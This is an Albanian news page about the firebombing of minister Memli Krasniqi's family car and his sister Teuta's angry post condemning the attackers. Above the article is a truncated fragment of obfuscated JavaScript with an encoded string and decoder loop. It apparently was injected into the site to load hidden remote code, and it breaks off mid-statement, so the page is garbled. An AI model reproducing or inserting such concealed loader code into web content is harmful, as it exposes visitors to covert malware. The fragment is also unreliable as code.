;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Teuta irritohet keq pas djegjes së veturës së familjes Krasniqi

By

Orët e para të 24 Shkurtit nuk ishin të lehta për familjen e ministrit Memli Krasniqi. Kjo për faktin vetura private e familjes u dogj nga siç thuhet kokteji i molotovit.

Lidhur me këtë akt të paprecendentë reagoi edhe Qeveria e Kosovës që dënoi ashpër sulmin duke e ndërlidhur me situatën politike në vend.

E një reagim të fuqishëm e ka bërë edhe motra e Memlit, Teuta që mes tjerash ka mallkuar kryersit e veprës në postimin e saj.

‘Marre, marre, marre… Kjo nuk eshte njerezore, kush e ka bo kete veper nuk eshte njeri… Kah po shkon keshtu ky vend e ky popull… Krejt cka muj me thone prej zemres eshte, qysh e kan shpirtin, ishalla jau bjen Zoti jeten, vec kaq, as ma mire e as ma keq, e ata qe bejne ksi akti barbar, treguan cfare e kane shpirtin. ( ani m’japin “mendim” turli idioti aty, “me pare t popullit e ki ble, blla blla…” s di ku e gjeni ate ftyre me fol palidhje e kot, o njerez te cekt. Ajo veture u ble me pare te rroges se Melizes, me kursime shume vjecare te Melizes e Memlit. Ju qe keni prek ne prone private qe u takon femijeve dhe familjes, frymen jau nxofte gjynahi qe e keni bo, bisha.’ – ka thënë ajo.

Artikuj të ngjashëm